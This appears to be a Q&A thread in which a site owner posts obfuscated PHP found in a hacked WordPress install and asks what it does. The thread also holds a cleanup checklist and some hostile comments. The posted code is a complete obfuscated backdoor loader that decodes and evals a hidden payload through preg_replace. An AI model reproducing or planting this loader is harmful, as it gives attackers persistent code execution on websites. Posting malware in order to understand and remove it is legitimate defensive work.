# Can anyone tell me what this code does?

Tags: php, wordpress

This code showed up in a hacked wordpress install and I couldn't make sense of it. Anyone know what it does exactly?

Sorry for the mess.

```
    <?php
if (!isset($GLOBALS["\x61\156\x75\156\x61"])) {
    $ua = strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]);
    if ((!strstr($ua, "\x6d\163\x69\145")) and (!strstr($ua, "\x72\166\x3a\61\x31")))
        $GLOBALS["\x61\156\x75\156\x61"] = 1;
}
?><?php
$chhwuiftjh = '%x5c%x7825j:,,Bjg!)%x5c%x7825j:>>1*!%x5c%x7825b:>1<!fmtf!%x1M5]D2P4]D6#<%x5c%x7825G]y6:~:<*9-1-r%x5c%x7825)s%x5c%x7825>%x5c%x782fh%x5c%x7825:<**#]68]y34]68]y33]65]y31]53]y6d]281]y43]]K6]72]K9]78]K5]53]Kc#<%x525ff2!>!bssbz)%x5c%x7824]25%x7825)sutcvt)esp>hmg%x5c%x7825%x5c%x7825)!gj}Z;h!opjudovg}{;#)tutjyf%x5c%x7860op6<*msv%x5c%x78257-MSV,6<*)ujojR%x5eN+#Qi%x5c%x785c1^W%x5-bubE{h%x5c%x7825)sutcvt-#w#)ldbqov>*ofmy%x5c%x7825)c%x7860msvd},;uqpuft%x5c%x78<*#k#)usbut%x5c%x7860cpV%x5c%x787f%x5c%x787f%x5c%x787f%!opjudovg}k~~9{d%x5c%x7825:o0{6~6<tfs%x5c%x7825w6<%x5c%x787fw6*CWtfs%x5c%x7825)7gj6<*id]y4c#<!%x5c%x7825t::!>!%x5c%x7824Ypp3)%x5c%x75!)!gj!<2,*j%x5c%x7825!-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825!*72!x5c%x78256<pd%x5c%x7825w6Z6<.3%x5c%x7860hA%x5c25j=tj{fpg)%x5c%x7825%x5c%x7824-%x5c787f;!|!}{;)gj}l;33bq}k;opjudovg}%x5c%x7878;0]=])0#)U!%x5c%x7827{*x5c%x7825tmw)%x5c%x7825tww**WYsboepn)%x5c%x7825bss-%x5vr#%x5c%x785cq%x5c%x7825)ufttj%x5c%x7822)gj6<^#Y#%x5c%x7d]281Ld]245]K2]285]Ke]53Ld]53]Kc]55Ld]55#*<%x5c%%x5c%x7824-%x5c%x7824gps)%x5c%x7825j>1<%x5c%x787827K6<%x5c%x787fw6*2<!gps)%x5c%x7825j>1<%x5c%x7825j=6[%x5c%x7825ww2!>#p#%x5c%x782f#p#%x5]271]y7d]252]y74]256]y39]252]y83]273]y72]282#<!%x5c%x5c%x787f<u%x5c%x7825V%x5c%x7827{ftmfV%x5c%x787f<*X&Z&S{ftmfV%x5:M8]Df#<%x5c%x7825tdz>#L4]275L3]248L3P6L9275ttfsqnpdov{h19275j{hnpd192754]284]364]6]234]342]58]24]31#-%x5c%x7825tdz*Wsfuvso!%x5c%x7825bss%7825)sutcvt)!gj!|!*bubE{h%x5c%x7825)j{hnp3]y76]252]y85]256]y6g]257]y86]267]y74]275]y7:]268]y7f#<!%x5c%x7!|!*1?hmg%x5c%x7825)!gx7825bG9}:}.}-}!#*<%x5c%x7825nfd>%x5c%x7825fdy3qj%x5c%x78257>%x5c%x782272qj%x5c%>b%x5c%x7825Z<#opo#>b%x5c%x7825!*##>>X)!gjZ<#*u%x5c%x7825-#jt0}Z;0]=]0#)2q%x5c%x7825l}S;2-u($n)-1);} @error_reporting(0); preg_replace("%x2%x5c%x7827!hmg%x5c%x7825)!gj!<2,57]38y]47]67y]37]88y]27]28y]#%x5c%x782fr%x5c%x7825%x5c%x782fh%x5c%x7%x785c^>Ew:Qb:Qc:W~!%x5c%x7825z!>-%x5c%x7825o:W%x5c%x7825c:>1<%x5c%x7825b:>1<!gps)%x5c%x78x7878:-!%x5c%x7825tzw%x5c%x782f%x5c%x7824)#P#-#Q#-#B#-#T#j6<.[A%x5c%x7827&6<%x5c%x787fw6*%x5c%x7k!~!<**qp%x5c%x7825!-uyfu%x5c%x7825)3of)fepdof%x5c%x786FUPNFS&d_SFSFGFS%x5c%x7860QUUI&c_UOFHB%x5c%x78257-C)fepmqnjA%x5c%x7827&6<.fmjgA%x5c%x7827doj%x5c%825)54l}%x5c%x7827;%x5c%x%x5c%x7825bT-%x5c%x7825,*e%x5c%x7827,*d%x5c%x7827,*c!*!+A!>!{e%x5c%x7825)!>>%x5c%x7822!ftmbg)!gj25-*.%x5c%x7825)euhA)3of>2bd%x5c%x7825!<5h%x5c%x7824-%x5c%x7824-tusqpt)%x5c%x7825z-#:#*%x5c%x7824-%x5c%x7824!>!tus%c%x782f#o]#%x5c%x782f*)323zbe!-#jt0*?]+^?]_%x5c%x785c}X%x5c%x7827825!<*#}_;#)323ldfid>}&;!osvufs}%x5c%x787f;x7825tjw!>!#]y84]275]y83]248]y83]256]y81]265]y72]254]y76#<%824gvodujpo!%x5c%x78246<*K)ftpmdXA6|7**197-2qj%x5c%x78257-K)udfoopdXA%x5c%x7822)%x5c%x7825t2w>#]y74]273hopmA%x5c%x78273qj%x5c%x78256<*Y%x5c%x7825)fnbozcYufhA%x5c%x78272q825tww!>!%x5c%x782400~:<h%x5c%x7825_t%x5c%x7825:osvufsc%x782f%x5c%x7825z<jg!)%x5c%x7825z>>2*!%x5c%xx5c%x7878:<##:>:h%x5c%x7825:<#64y]552]e7y]#>n%x5c%x7825<#372]58y]472]37y]672]48y]#>s%x5c%x7825<#462]47y]252]1%163%x70%154%x69%164%50%x22%134%x78%62%x35%165%x3a%146%x21%76%x21%50%%x7824*<!~!dsfbuf%x5c%x7860gvodujpo)##-!#~<#%x5c%x782f%x5c%x78c%x7825%x5c%x782f#0#%x5c%x782f*#npd%x5c%x782f#)973:8297f:5297e:56-%x5c%x78bg!osvufs!|ftmf!~<**9.-j%x}+;%x5c%x7825-qp%x5c%x7udovg%x5c%x7822)!gj}1~!<2p%x5c%x7825%x5c%x787f!~!<#fubmgoj{h1:|:*mmvo:>:iuhofm%x5c%x7825:-5ppde:4:x5c%x7860sfqmbdf)%x5c%x7825%x5c3q%x5c%x7825}U;y]}R;2]x7825)7gj6<**2qj%x5c%x7825)hopm3qjA)qj62]y3:]84#-!OVMM*<%x22%51%x29%51%x29%73", NULL); }%x5c%x7825:|:**t%x5c%x7825)m%x5c%x7825=*h%x5c%x7825)m%x5c%x7825):fmji%<Cb*[%x5c%x7825h!>!%x5c%x7825tdz)%x5c%x7825bbT-j%x5c%x78256<^#zsfvr#%x5c%x785cq%x5c%x78257%x5c%x782f7#@#7%x5c%x7825)Rb%x5c%x7825))!gj!<c%x7825w%x5c%x7860%x5cTQcOc%x5c%x782f#00#W~!Ydrr)%x5c%x7825r%x5c%x7878Bsfuvso!sboepn)%x5%x7825)3of:opjudovg<~%x5c%x7824<!%x5c%x*j%x5c%x7825-#1]#-bubE{h%x5c%x78c%x7825)sf%x5c%x7878pmpusut)tpqssutRe%x5c%x7825)Rd%x5cuofuopD#)sfebfI{*w%x5c%x7825)kV%x5c%x7878{**#k#)tutjyf%x5c%x7860%%x7824%x5c%x782f%x5c%x7825kj:-!OVMM*<(<%x5c%x78e%x5c%x156%x75%156%x61"]=1; function fjfgg($n){return chr(ord%x7825w6Z6<.4%x5c%x7860hA%x5c%x7827pd%%x782f7^#iubq#%x5c%x785cq%x5c%x7825%x5c%x782j:!>!#]y3d]51]y35]256]y76]72]y3d]51]y35]274]y4:]82]y3:]62%x5c%x7860SFTV%x5c%x7860QUUI&b%x5c%x7825!|!*)323zbek!~!<b%4<!%x5c%x7825tzw>!#]y76]277]y72]265]y39]274]y85]273]y6g]273]y76D4]273]D6P2L5P6]y6gP7L6M7]D4]275]Dh>EzH,2W%x5c%x7825wN;#-Ez-1H*WCw*[!%x5c%x7825rN}#QwTW%x578b%x5c%x7825ggg!>!#]y81]273]y76]258]y6g]273]ysvufs:~928>>%x5c%x7822:ftmbgd%x5c%x78256|6.7eu{66~6%x7824-%x5c%x7824y4%x5c%zbssb!>!ssbnpe_GMFT%x5c%x7860QIQ&f_UTPI%x5c%x7860QUUI&e_SEEB%x5c%x7860isset($GLOBALS["%x61%156%x75%156%x61"])))) { $GLOBALS["%x61%f%50%x2e%52%x29%57%x65","%x65%166%x61%187f_*#[k2%x5c%x7860{6:!}7;!}6;x5c%x78257;utpI#7>%x5c%x782f7rfs%x5c%x78256<#o]1%x5c%x782fvg+)!gj+{e%x5c%x7825!osvufs4-%x5c%x7824<%x5c%x7825j,,*!|%x5c%x7824-%x5c%x7opo#>b%x5c%x7825!**X)ufttj%x5c%x7822)gj!|!*nbsbq%x5c%x7825)323ldfidc%x7825hIr%x5c%x785c1^-%x5c%x7825r%x5c%x785c2^-%x5c%x7825x5c%x7825)}.;%x5c%x7860UQPMSVD!-id%x5c%x7825)uqpuft%x539*56A:>:8:|:7#6#)tutjyf%x5c%x7860432p%x5c%x7825!|!*!***b%x5c%x7825)sf%x5c%x7878pmpusut!6g]273]y76]271]y7d]252]y74]256#<!%x5c%x78825,3,j%x5c%x7825>j%x5c%x7825!<**3-j%x5c%x782c%x7825tpz!>!#]D6M7]K3#<%%x7860GB)fubfsdXA%x5c%x}88:}334}472%x5c%x7824<!%x5c%x7825mm!>!#]y81]273]y76]258]y]y72]265]y39]271]y83]256]y78]x5c%x7825V<#65,47R25,d7R17,67R37,#%x5c%x782fq%x5c%x7825>U<%x5c%x7827,*b%x5c%x7827)fepdof.)fepdof.%x5c%x782f#@#%x5c%x782fqp%20QUUI7jsv%x5c%x78257UFH#%x5c%x7827rfs%:*r%x5c%x7825:-t%x5cx782f#%x5c%x782f#%x5c%x782f},;#-#256<*17-SFEBFI,6<*127-UVPFNJU,6<*27-SFGTOBSUOSVUFS,825cB%x5c%x7825iN}#-!tussfw)%x5c%x7825c*W%x5c%x782utjm!|!*5!%x5c%x7827!hmg%x5c%x7825)!gj5c%x7827id%x5c%x78256<%x5c%x787fw6*%x5c%x72f!#0#)idubn%x5c%x7860hfsq)!sp!*#ojneb#-*f%x57**^%x5c%x782f%x5c%x78786<C%x5c%x7827&6<*rfs%x5c%x78257-K)f7825o:!>!%x5c%x78242178}52760msvd}+;!>!}%x5c%x7827;!>>>!}_;gvc%x5c%x7825}&;ftmbg}%x5c%x787f;860%x5c%x7825}X;!sp!*#opo#>>}R;msv}.;%x5c%48]32M3]317]445]212]445]43]321]46x5c%x7825%x5c%x787f!<X25j:>1<%x5c%x7825j:=tj{fpg)%x5c%x7825s:*<2)eobs%x5c%x7860un>qp%x5c%x7825!|Z~!<##!>!85cq%x5c%x7825%x5c%x7827Y%x5c%x78256<.msv%x5c%x7860ftsbqA7>78r.985:52985-t.98]K4]65]D8]86]y31]278]y3f]51L3]84]y31M6]y3e]81#%x5c%gj!<*2bd%x5c%x7825-#1GO%x5c%x7822#)fepmqyfA>2b%x5c%x7825!<*qp%x5c%x78782f7&6|7**111127-K)ebfsX%x5c%x7827u%x5c%x7825)7fmji%x5c%x77gj6<*QDU%x5c%x7860MPT7-NBFSUT%x5#!>!2p%x5c%x7825Z<^2%x5c%x785c2b%x5c%x782c%x7825r%x5c%x7878B%x5c%x7825h>#]y31]278]y3e]81]K78:56985:61x5c%x7825>5h%x5c%x7825!<*::::::-11111hOh%x5c%x782f#00#W~!%x5c%x7825t2w)##Qtjw)#]82#-#!#-%#%x5c%x782f#M5]DgP5]D6#<%x5c%x7825fdy>#]x78256<%x5c%x787fw6*%x5c%x5c%x7825tmw!>!#]y84]275]y83]273]y76]277#<if((function_exists("%x6f%142%x5f%163%x74%141%x72%164") && (!-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*%x5cx5c%x7878%x5c%x7822l:!}V;8y]#>q%x5c%x7825<#762]67y]562]38y]572]48y]#>m%x5c%x7825:|%x5c%x7825)ftpmdR6<*id%x5c%x%x7824-%x5c%x7824%x5c%x785c%x5c%x7825j^%x5c%x7824-%x5c%x7824tvctusc%x7825epnbss-%x5c%x7825r%x5c%x7878W~!Ypp2)%x5c%x7825z*#cd2bge56+99386c6f+9f5d816:+946:ce44#)7jsv%x5c%x78256<C>^#zsfvr#%x5c%x785cq%x5c%x78257**^#zsf825>j%x5c%x7825!*3!%x5c%x7827!hmg%x5c%x782rrd%x5c%x782f#00;quui#>.%x5c%x7825!<***f%x5c%x782776]271]y7d]252]y74]256#<!%x5c%x7825ggg)(0)%x5c%x782f+*0f(-!#]y76]277x787f_*#fmjgk4%x5c%x786pdfe{h+{d%x5c%x7825)+opjudo5!>!2p%x5c%x7825!*3>?*2b%x5c%x7825)gpf{jt)!hW~%x5c%x7825fdy)##-!#~<%x5c%x7825h00#*<%x5c%x7825nfd)##Qtpz)#]341]8!<12>j%x5c%x7825!|!*#91y]c9y]g2y]#>>*4-1-bubE{h%x5c%x7825c:>%x5c%x7825s:%x5c%x785c%x5c%x7825j:^<!%x5x5c%x78b%x5c%x7825w:!>!%x5c%x7ujs%x5c%x7878X6<#o]o]Y%x7824-%x5c%x7824]y8%x5c%x7824-%x5c%x7824]26%x5c%x782%x785c2^<!Ce*[!%x5c%x7825cIjQe54%x28%151%x6d%160%x6c%157%x64%145%x28%141%x72%162%x61%171%x7825%x5c%x785cSFWSFT%x5c%x7j!<**2-4-bubE{h%x5c%B%x5c%x7825z>!tussfw)%x5c%x7825zW%x5c%x7825dpt%x5c%x7825}K;%x5c%x7860ufldpt}X;%x5c%x7860msvd}R;*msv%q%x5c%x78256<%x5c%x787fw6*%x5c%x787f_*#fubf7<&w6<*&7-#o]s]o]s]#)fepmqyf%x5c%x7827*&7-n%x5c%x7825)utjm6<%x5cd!opjudovg!|!**#j{hnpd#)tutjyf%x5c%x7860opjx7860TW~%x5c%x7824<%x5c%x78e%x5c%x78b%x5c%x7825mm)%x5c%x7825%x5c%x5c%x7825%x5c%x7878:!>#]y3g]61]y3f]63]y3:]68]y76#<%x5c%x78e%057ftbc%x5c%x787f!|!*uyfu%x5c%x7827k:!ftmf!}Z;^nbsbq%x5c%x5c%x7824-%x5c%x7824-!%x5c%x7825%x5c%x7824-%x5c%x7824*!|!%x5c-#j0#!%x5c%x782f!**#sfmcnbs+yfeobz+sfwjid78]y33]65]y31]55]y85]82]y76]825)n%x5c%x7825-#+I#)q%x5c%x7825:>:rA%x5c%x7827pd%x5c%x78256<pd%x5c<.2%x5c%x7860hA%x5c%x7827pd%x5c%x78256<C%x5c%x7827p-%x5c%x7824y7%x5c%x7824-%x5c%x7824*<!x5c%x78256~6<%x5c%x787fw)%x5c%x7825%x5c%x7824-%x5c%x7824b!>!%x5c%x7825yy)#}#-#%x55c%x7825c!>!%x5c%x7825i%x5c25%x5c%x7824-%x5c%x7824!>!fyqmpef)#%x5c%x7824*<!%x5c%x7825k87f_*#ujojRk3%x5c%x7860{666~6<&w6<%x5c%x787fw6*CW&)7g8M4P8]37]278]225]241]334]368]322]3]364]6]283]427]36]373P6]36x5c%x785csboe))1%x5c%x782f35.)1%x5c%x782f14+9**-)1%x5c%x782f2986+5c%x7825-bubE{h%x5c%x7825)sutcvt)fubmgoj{hA!osvufs!~<3,j%x5c%x77825)dfyfR%x5c%x7827tfs%x5c%x78x5f%155%x61%160%x28%42%x66%152%x66%147%x67%%x787fw6*CW&)7gj6<*K)ftpmdXA6~6<u%x5c%x78257>%x5c%x25)tpqsut>j%x5c%x7825!*9!%x5c%x7827!hmg%x5c%x7825)!gj!~<ofmy%x5c%x75,67R37,18R#>q%x5c%x7825V<*#fopoV;hojepdoF.42%x2c%163%x74%162%x5f!osvufs}w;*%x5c%x787f!>>%x5c%x7822!pdsdXk5%x5c%x7860{66~6<&w6<%x5c%x787fw6*CW&)7gj6<*doj5c%x7825b:>%x5c%x7825s:%x5c%x785c%x5c%x7825j:.2^,%x5c%x7825b:<!%x5c%xx782f#7e:55946-tr.984:75983:48984:71]K9]77]D4]82c%x7860LDPT7-UFOJ%x5c8246767~6<Cw6<pd%x5c%x7825w6Z6<.5%x5c%x7860h97g:74985-rr.93e:5597f-s.##}C;!>>!}W;utpi}Y;tuofuopd%x5c%x7860ufh%x5c%x7860fmjg}[;lc%x787f<*XAZASV<*w%x5c%x7825)ppde>u%x5c%x7825yy>#]D6]281L1%x7827pd%x5c%x78256<pd%x5c%x7825w6Z6sb%x5c%x7860bj+upcotn+qsvmt+fmhpph#)zbssb!-#}#)fepmqnj!%x5c%x78%x5c%x7825!-#2#%x5c%x782f#%x5c%x7825#%x5]73]83]238M7]381]211M5]67]452]88]5]825r%x5c%x7878<~!!%x5c%x7825s:N}#248]y83]256]y81]265]y72]254]y76]61]y337825z>3<!fmtf!%x5c%x7825z>2<!%x5c%x7825ww2)%x5c%x7825w%x5c%judovg)!gj!|!*msv%x5c%x7825)}k~~~<ftm#16,47R57,27R66,#%x5c%x782fq%x5c%x7825>2q%x5c%x7825<#g6R8},;osvufs}%x5c%x7827;mnui}&;zepc}A;~!}%x5c%x|:**#ppde#)tutjyf%x5c%x78604%x5c%x78223}!+!<+{e%x5c%x7825+*!*+fe/(.*)/epreg_replacesoxyccylmv';
$tixpyrhtzz = explode(chr((137 - 93)), '6698,61,4592,60,3997,54,1701,48,4652,39,7700,59,8963,43,9167,22,2967,69,8122,60,7565,30,9415,44,8405,31,4051,38,708,46,9600,36,8436,51,4475,23,7950,64,9006,51,6309,59,5802,38,7595,23,4721,58,5463,39,8524,24,2612,58,6368,33,9394,21,5230,23,1061,20,1576,34,3372,38,2692,67,3577,62,4089,44,7089,55,910,56,6112,59,7907,43,9226,51,2128,59,6631,25,7304,23,535,59,6902,28,8932,31,5555,51,316,33,5694,42,8691,53,1996,39,4691,30,9484,58,7850,57,4977,54,424,28,5867,65,9189,37,266,50,9904,37,3172,26,8869,63,7144,42,639,69,1749,32,3792,32,9057,67,5160,45,371,53,5656,38,1508,22,7787,20,236,30,7465,53,1404,41,8014,43,3221,51,6401,41,7354,43,6240,69,2308,45,3098,47,7186,50,2235,29,5398,65,6502,37,6070,42,5067,52,8300,41,9636,63,5736,45,3824,54,3639,26,7050,39,4522,70,2090,38,4190,58,6007,22,1610,45,4853,67,2035,55,8182,57,7759,28,5932,42,5522,33,3198,23,2187,25,2487,44,507,28,4447,28,5031,36,1306,32,3272,47,10042,64,7327,27,4779,27,2264,44,452,55,1202,64,9542,36,5340,58,9941,57,9124,43,3878,65,6820,25,3350,22,9998,44,790,66,1655,46,9699,40,2423,64,4248,63,1150,52,2531,59,6656,42,2670,22,1445,63,2759,54,86,59,1781,68,8369,36,3460,70,2858,58,2916,51,6845,57,5502,20,3753,39,5840,27,5253,58,5119,41,208,28,8239,61,6930,66,8548,57,2353,70,3319,31,4498,24,7618,52,4806,47,2590,22,8487,37,1014,47,754,36,3036,62,8632,59,4133,57,594,45,5606,50,349,22,8605,27,7670,30,3687,66,6996,54,7807,43,4345,56,4920,57,6539,52,856,54,6442,60,9459,25,3145,27,6171,69,9346,48,182,26,5205,25,9578,22,6591,40,4311,34,1266,40,59,27,966,48,1530,46,3530,47,2212,23,7397,68,8744,60,9739,35,5974,33,1338,66,8804,65,5781,21,9774,33,1882,57,6029,41,0,59,9277,69,7518,47,3665,22,1849,33,1081,69,2813,45,9845,59,8057,65,1939,57,6759,61,3943,54,4401,46,7236,68,5311,29,9807,38,145,37,8341,28,3410,50');
$bcidkfumgh = substr($chhwuiftjh, (53382 - 43276), (34 - 27));
if (!function_exists('llanineuke')) {
    function llanineuke($yxidvbxjao, $ekpdfiiyby)
    {
        $fgjggfpxoa = NULL;
        for ($oekjgwdylc = 0; $oekjgwdylc < (sizeof($yxidvbxjao) / 2); $oekjgwdylc++) {
            $fgjggfpxoa .= substr($ekpdfiiyby, $yxidvbxjao[($oekjgwdylc * 2)], $yxidvbxjao[($oekjgwdylc * 2) + 1]);
        }
        return $fgjggfpxoa;
    }
    ;
}
$ijrkaiuogd = "\x20\57\x2a\40\x6b\167\x69\171\x67\165\x61\145\x67\156\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x32\62\x32\55\x31\70\x35\51\x29\54\x20\143\x68\162\x28\50\x35\60\x30\55\x34\60\x38\51\x29\54\x20\154\x6c\141\x6e\151\x6e\145\x75\153\x65\50\x24\164\x69\170\x70\171\x72\150\x74\172\x7a\54\x24\143\x68\150\x77\165\x69\146\x74\152\x68\51\x29\51\x3b\40\x2f\52\x20\151\x76\166\x63\167\x66\163\x6f\143\x75\40\x2a\57\x20";
$nrgfsqntyb = substr($chhwuiftjh, (31329 - 21216), (75 - 63));
$nrgfsqntyb($bcidkfumgh, $ijrkaiuogd, NULL);
$nrgfsqntyb = $ijrkaiuogd;
$nrgfsqntyb = (516 - 395);
$chhwuiftjh = $nrgfsqntyb - 1;
?>
```

Comment: A hacked website, eh? Are you on GoDaddy by chance?

Comment: @Andre thanks for the insight....@Octopus nope on a cPanel host though.

Comment: @Andre Except it's completely obfuscated, so no, it's not. Don't act like you know what you're talking about [when other people have already done the legwork](http://security.stackexchange.com/questions/70579/is-this-a-backdoor) that you only pretend to understand.

Comment: @maiorano84 ok? What makes you think I don't about this? Just because you have 5,000 + fame don't mean anything, acting like your the judger assuming other people don't know it.

Comment: @Andre I'm sorry that you're butthurt over getting called out for pretending like you actually understand what this does (you don't), but your comment contributes nothing to this discussion. It's also cute that you think points are somehow relevant. Grow up.

Comment: @maiorano84 I'll teach you at any time :)

Comment: @Andre I don't think you have a whole lot to teach when [you don't even understand a simple concept like If brackets](http://stackoverflow.com/questions/28799434/php-bracket-less-if-condition-not-accepting-more-than-one-statement). But keep trying, little man.

Comment: @maiorano84 at least I ask questions when I have. Always learning, always growing always improving. You're just stupid and cocky and just jelous because you don't know what you talk. Lets have a real chat so you wont have enough time to google your answers. Weirdo.

Answer (score 1, accepted):

Don't worry about what it does. You got hacked, and the longer you wait, the more damage this can cause. Here's what you do:

- Inventory your Wordpress installation. Make note of every plugin and theme you're using, and any settings they might have
- Make a local backup by downloading your entire Wordpress installation
- Export your database locally. You can do this through MySQL Workbench, SequelPro, or (*shudder*) PHPMyAdmin
- Delete Wordpress (everything except wp-content)
- Delete all Plugins
- Delete all Themes
- If this is a custom theme, go through each file in your local copy and look for any suspicious code. If you have PHPStorm, you can run Find in Path on your active theme directory and search recursively for "`isset($GLOBALS`" (without quotes). If your custom theme extends a parent theme, repeat this process for the parent theme or re-download the parent theme.
- Check all remaining directories for loose PHP files that don't exist within a Plugin or Theme context. This includes your Uploads directory, and its index.php file. Open each PHP file you find and check its content for suspicious code. Most - if not all - of these files should just have a single comment reading `//silence is golden`
- Reinstall the latest version of Wordpress
- Reinstall, activate, and configure all of your plugins
- Replace your active theme(s) with your local cleaned versions, or - if possible - reinstall them from their dedicated repositories
- Check your Users section. Delete any users you don't recognize
- Refresh your .htaccess file by re-saving your Permalinks settings.
- Change your Dashboard, Database User, Root Database User, and FTP passwords. If you have SSH credentials, you should probably update your SSH password there as well
- DO NOT USE ROOT AS YOUR DATABASE USER. Change this if you are, and slap yourself for doing it in the first place.
- Install [Wordfence](https://www.wordfence.com/) and pray you don't get hacked again

If you make a mistake somewhere, you can always re-import your database. It is not recommended to move your infected backup files back to your server.

That's about everything I can think of off the top of my head. A surefire way to not get hacked like this again is to [stop using Wordpress altogether](http://bolt.cm)

Comment: Thanks so much for that super in depth answer. What you're describing is exactly what I've done. In the post you referenced with respect to what the code does, none of the sites that have this issue use Mailpoet. That being said, i am cleaning out the trash and have daily backups so I'll have to see where else the intrusion could have been.

Comment: @maiorano84  How can this be the answer for the question he is asking?

Answer (score -1):

It's very simple.

1. Spin up a sand-boxed Lamp stack
2. Run the code in a debug session
3. Inspect output line by line

That will give you some insights. But I can tell you one thing though. This code is dependent on a key to work.